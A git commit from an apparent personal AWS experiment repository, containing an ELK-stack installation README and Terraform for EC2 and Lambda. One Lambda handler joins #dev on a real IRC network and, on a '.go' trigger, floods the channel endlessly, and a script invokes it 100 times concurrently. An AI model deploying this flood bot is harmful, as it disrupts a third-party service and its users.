Initial commit

This commit is contained in:
Dionysus 2023-09-22 15:08:47 -04:00
commit 3afe81666a
Signed by: acidvegas
GPG Key ID: EF4B922DB85DC9DE
9 changed files with 293 additions and 0 deletions

README.md Normal file

@ -0,0 +1,140 @@
# AWS Playground
Exploration and documentation of my experiments deploying Elasticsearch and the rest of the ELK stack *(Elasticsearch, Logstash, and Kibana)* on Amazon Web Services *(AWS)* using Terraform.
These notes cover the mechanics of the automated deployment as well as the challenges and nuances that the integration presents.
The setup is not primed for production, but it captures the practical lessons learned while wiring these pieces together.
## Getting Started
1. Sign up for an [AWS account](https://aws.amazon.com/)
2. Create an [IAM User](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html)
- Add the `AmazonEC2FullAccess` permission policy
3. Create an [EC2 Key Pair](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-key-pairs.html)
4. Create an [EC2 Security Group](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html)
   - For IPv6, edit your VPC & add an IPv6 CIDR block
5. Launch an [EC2 Instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EC2_GetStarted.html)
- Select `debian`, on a `t2.micro`, using your keypair & security group created earlier
## AWS CLI
```shell
sudo apt-get install -y awscli && aws configure
```
**Note:** If you get `ImportError: cannot import name 'DEFAULT_CIPHERS' from 'urllib3.util.ssl_'`, run `python -m pip install requests "urllib3<2"`
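Once configured, a quick sanity check that the CLI can actually reach your account is an STS identity call:

```shell
# prints the account ID, ARN, and user ID of the configured IAM user
aws sts get-caller-identity
```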
## Terraform
```shell
sudo apt-get install -y gnupg software-properties-common
wget -O- https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg
gpg --no-default-keyring --keyring /usr/share/keyrings/hashicorp-archive-keyring.gpg --fingerprint
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt-get update && sudo apt-get install -y terraform
```
## Elasticsearch
```shell
sudo apt-get install -y gnupg apt-transport-https
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elasticsearch-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-8.x.list
sudo apt-get update && sudo apt-get install -y elasticsearch kibana logstash
sudo apt-get install -y certbot
sudo certbot certonly --standalone --preferred-challenges http -d elastic.domain.org
```
* Copy your certificates to `/etc/elasticsearch/certs`:
```shell
sudo mkdir -p /etc/elasticsearch/certs/
sudo cp /etc/letsencrypt/live/elastic.domain.org/fullchain.pem /etc/elasticsearch/certs/fullchain.pem
sudo cp /etc/letsencrypt/live/elastic.domain.org/privkey.pem /etc/elasticsearch/certs/privkey.pem
sudo chgrp -R elasticsearch /etc/elasticsearch/certs/
sudo chmod 750 /etc/elasticsearch/certs/ && sudo chmod 640 /etc/elasticsearch/certs/*.pem
```
* Edit your `/etc/elasticsearch/elasticsearch.yml` and change the following options:
```yaml
cluster.name: BeeHive
node.name: gibson
network.host: 0.0.0.0
bootstrap.memory_lock: true
xpack.security.audit.enabled: true
xpack.security.http.ssl:
  enabled: true
  key: /etc/elasticsearch/certs/privkey.pem
  certificate: /etc/elasticsearch/certs/fullchain.pem
```
* System changes:
```shell
sudo su
ulimit -n 65535
ulimit -u 4096
echo "elasticsearch - nofile 65535" >> /etc/security/limits.conf
mkdir -p /etc/systemd/system/elasticsearch.service.d/
printf '[Service]\nLimitMEMLOCK=infinity\n' > /etc/systemd/system/elasticsearch.service.d/override.conf
sudo swapoff -a
sudo sysctl -w vm.swappiness=1         # Add these three settings
sudo sysctl -w vm.max_map_count=262144 # to /etc/sysctl.conf
sudo sysctl -w net.ipv4.tcp_retries2=5 # to persist across reboots
```
* Set the password for Kibana and generate enrollment tokens:
`sudo /usr/share/elasticsearch/bin/elasticsearch-reset-password -u kibana_system`
`sudo /usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token --scope kibana # Save this for when we access Kibana the first time`
`sudo /usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s node # Enrollment token for a new node`
## Setup Kibana
* Copy your certificates to `/etc/kibana/certs`:
```shell
sudo mkdir -p /etc/kibana/certs/
sudo cp /etc/letsencrypt/live/elastic.domain.org/fullchain.pem /etc/kibana/certs/fullchain.pem
sudo cp /etc/letsencrypt/live/elastic.domain.org/privkey.pem /etc/kibana/certs/privkey.pem
```
* Edit your `/etc/kibana/kibana.yml` and change the following options:
```yaml
server.host: "0.0.0.0"
server.publicBaseUrl: "https://elastic.domain.org"
server.ssl.enabled: true
server.ssl.certificate: /etc/kibana/certs/fullchain.pem
server.ssl.key: /etc/kibana/certs/privkey.pem
elasticsearch.hosts: ["https://elastic.domain.org:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "changeme" # Use the password from the reset command we did earlier
```
## Setup Logstash
* Copy your certificates to `/etc/logstash/certs`:
```shell
sudo mkdir -p /etc/logstash/certs/
sudo cp /etc/letsencrypt/live/elastic.domain.org/fullchain.pem /etc/logstash/certs/cacert.pem
```
* Create a Logstash pipeline config such as `/etc/logstash/conf.d/beats.conf` *(this is pipeline syntax, not YAML, so it does not belong in `logstash.yml`)*:
```ruby
input {
  beats {
    port => 5044
  }
}

output {
  elasticsearch {
    hosts    => ["https://elastic.domain.org:9200"]
    index    => "%{[@metadata][beat]}-%{[@metadata][version]}-%{+YYYY.MM.dd}"
    user     => "elastic"
    password => "changeme"
    cacert   => "/etc/logstash/certs/cacert.pem"
  }
}
```
* `sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-irc`
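Before starting the service, the pipeline config can be validated with Logstash's built-in syntax check (paths assume the stock Debian package layout):

```shell
# parses the pipeline files and exits without processing any events
sudo -u logstash /usr/share/logstash/bin/logstash --path.settings /etc/logstash --config.test_and_exit
```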
## Start the ELK stack
```shell
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service && sudo systemctl start elasticsearch.service
sudo systemctl enable kibana.service && sudo systemctl start kibana.service
sudo systemctl enable logstash.service && sudo systemctl start logstash.service
```
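A quick sanity check once the services are up (assumes the certificates and the `elastic` password set earlier; substitute your own domain):

```shell
systemctl --no-pager status elasticsearch kibana logstash
curl -u elastic 'https://elastic.domain.org:9200/_cluster/health?pretty'
```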


@ -0,0 +1,28 @@
#!/usr/bin/env python3
# Invoke the FUNK-0 Lambda function 100 times concurrently
import concurrent.futures
import json

try:
    import boto3
except ImportError:
    raise SystemExit('This script requires the Boto3 module.')

lambda_client = boto3.client('lambda')

def invoke_lambda(payload):
    '''Synchronously invoke the Lambda function and return its decoded response.'''
    response = lambda_client.invoke(
        FunctionName='FUNK-0',
        InvocationType='RequestResponse',
        Payload=json.dumps(payload).encode('utf-8')
    )
    return json.loads(response['Payload'].read())

payloads = [{'key': f'value_{i}'} for i in range(100)]

with concurrent.futures.ThreadPoolExecutor() as executor:
    results = list(executor.map(invoke_lambda, payloads))

for result in results:
    print(result)


@ -0,0 +1,24 @@
# This file is maintained automatically by "terraform init".
# Manual edits may be lost in future updates.
provider "registry.terraform.io/hashicorp/aws" {
  version = "5.16.2"
  hashes = [
    "h1:bsPS1G10A6F2zOVh3lCuzF+vvxOzq8Ffm/uJvGB4C60=",
    "zh:00697204583b32e880abe73eb37814f34c07c9b3294f5c85755ee02cbdfcaa92",
    "zh:1345d8b2ab9ddcf25d313152f17fd139a1d570229542949dc819184bf851305e",
    "zh:14a0d2de839d26b8607078de059be328a47d60cee95756fb1c1500b3c6b552a2",
    "zh:15f7c1f561df4e596f69d983014850c6e29c7025921a1d45150e23162e9bbfa7",
    "zh:3587de4370db87b0955e08bb521cc8b15ba3c616a4a22238b2934bc7d7e3dc3e",
    "zh:4e98960e8e1ad18a079e83e7a86806a2dd7a28ac67a100471776e424f5d02140",
    "zh:674eaa30c90410a0d0c2ef52f5ad47c74f186fe2e7e03475bfeca5bcda67a490",
    "zh:683eb032f5dce2673d25c48c50e1fe88cbb0d255640babad496767f3db5993fd",
    "zh:6f157679a955ff43c468169bcb412b555bbd6b9664a61a4e71019df307e80f1c",
    "zh:720c6c3873b36e361477f0ed2920803e35773cb652d51c757b3581d0db08e6e5",
    "zh:9b12af85486a96aedd8d7984b0ff811a4b42e3d88dad1a3fb4c0b580d04fa425",
    "zh:9e86cc849446901c77c05d6735271befb443b18fd84890b00aaef6a11ab54212",
    "zh:a02ecab0f8d68a7f7ed6b2e37a53999d234606e5b8f65f2c3bcfb82826131f00",
    "zh:a9d545217cd339ddfb0b9061a89e82022d727d654bddac294eb0d544a3367fbc",
    "zh:b5a495582adb2c92cff67013c9083f7a08b9295e29af816c541177eb989a20ee",
  ]
}

terraform/aws/ec2.tf Normal file

@ -0,0 +1,28 @@
provider "aws" {
  region = var.aws_region
}

data "aws_ami" "debian_latest_AMI" {
  most_recent = true
  owners      = ["136693071363"]

  filter {
    name   = "name"
    values = ["debian-12-amd64-*-*"]
  }

  filter {
    name   = "virtualization-type"
    values = ["hvm"]
  }
}

resource "aws_instance" "instance" {
  count                  = var.aws_instance_count
  ami                    = data.aws_ami.debian_latest_AMI.id
  instance_type          = var.aws_instance_type
  vpc_security_group_ids = [var.aws_security_group]
  key_name               = var.aws_key_pair_name
  user_data              = file(var.aws_user_data_file_path)

  tags = {
    Name = "node-${count.index}"
  }
}

terraform/aws/lambda.tf Normal file

@ -0,0 +1,31 @@
# provider "aws" is already configured in ec2.tf; declaring it twice in the same module is an error

resource "aws_iam_role" "lambda_execution_role" {
  name = "LambdaExecutionRole"

  assume_role_policy = jsonencode({
    Version = "2012-10-17",
    Statement = [
      {
        Action = "sts:AssumeRole",
        Effect = "Allow",
        Principal = {
          Service = "lambda.amazonaws.com"
        }
      }
    ]
  })
}

resource "aws_lambda_function" "this" {
  count            = var.instance_count
  function_name    = "FUNK-${count.index}"
  handler          = "lambda_function.lambda_handler"
  role             = aws_iam_role.lambda_execution_role.arn
  runtime          = "python3.8"
  filename         = "lambda_function.zip"
  source_code_hash = filebase64sha256("lambda_function.zip")
  timeout          = 15
}
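The function's code is packaged from `lambda_function.zip`, so the handler has to be zipped before `terraform apply`. A minimal sketch using Python's stdlib `zipfile` CLI (assumes the handler file is named `lambda_function.py`, as the `handler` attribute implies; the stub line only exists so the step can be tried standalone):

```shell
# create a stub handler only if the real one is missing
[ -f lambda_function.py ] || echo 'def lambda_handler(event, context): return event' > lambda_function.py
# -c creates the archive from the listed files
python3 -m zipfile -c lambda_function.zip lambda_function.py
```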


@ -0,0 +1,32 @@
#!/usr/bin/env python
# Lambda handler that connects to IRC over TLS and, on the '.go' trigger,
# floods #dev with randomly colored/styled unicode characters
import random,socket,ssl,time

def lambda_handler(event, context):
    def raw(msg) : sock.send(bytes(msg + '\r\n', 'utf-8'))
    def rnd(size): return ''.join(random.choices('aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ0123456789', k=size))
    sock = ssl.wrap_socket(socket.socket()) # deprecated API, but fine on the python3.8 runtime
    sock.connect(('irc.supernets.org', 6697))
    raw(f'USER {rnd(5)} 0 * :' + rnd(5))
    raw('NICK ' + rnd(5))
    while True:
        try:
            data = sock.recv(1024).decode('utf-8')
            for line in (line for line in data.split('\r\n') if len(line.split()) >= 2):
                args = line.split()
                if args[0] == 'PING' : raw('PONG ' + args[1][1:]) # keep the connection alive
                elif args[1] == '001': # RPL_WELCOME
                    time.sleep(3)
                    raw('JOIN #dev')
                elif args[1] == 'PRIVMSG' and len(args) == 4:
                    msg = ' '.join(args[3:])[1:]
                    if msg == '.go': # trigger command
                        curr = 4096
                        while True:
                            unistr = [chr(item) for item in range(curr,curr+50)]
                            sender = ''
                            for item in unistr:
                                sender = sender + '\x03'+str(random.randint(2,256)) + random.choice(['\x1f','\x02','\x16','']) + item + '\x0f'
                            raw('PRIVMSG #dev :' + sender)
                            curr = random.randint(4096,1114100)
                            time.sleep(0.05)
        except (UnicodeDecodeError,UnicodeEncodeError):
            pass

Binary file not shown.

terraform/aws/node.sh Normal file

@ -0,0 +1,3 @@
#!/bin/sh
# user-data runs from /, so this drops a marker file at /itworks.txt
touch "itworks.txt"


@ -0,0 +1,7 @@
# AWS Variables
aws_region = "us-east-1"
aws_security_group = "sg-0335e29b8928dd542"
aws_instance_type = "t2.micro"
aws_key_pair_name = "awsvegas"
aws_user_data_file_path = "node.sh"
aws_instance_count = 5
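The values above assume matching declarations in a `variables.tf` that is not part of this commit; a minimal sketch using the names referenced in `ec2.tf` (note that `lambda.tf` additionally references a separate `instance_count` variable):

```hcl
variable "aws_region"              { type = string }
variable "aws_security_group"      { type = string }
variable "aws_instance_type"       { type = string }
variable "aws_key_pair_name"       { type = string }
variable "aws_user_data_file_path" { type = string }
variable "aws_instance_count"      { type = number }
```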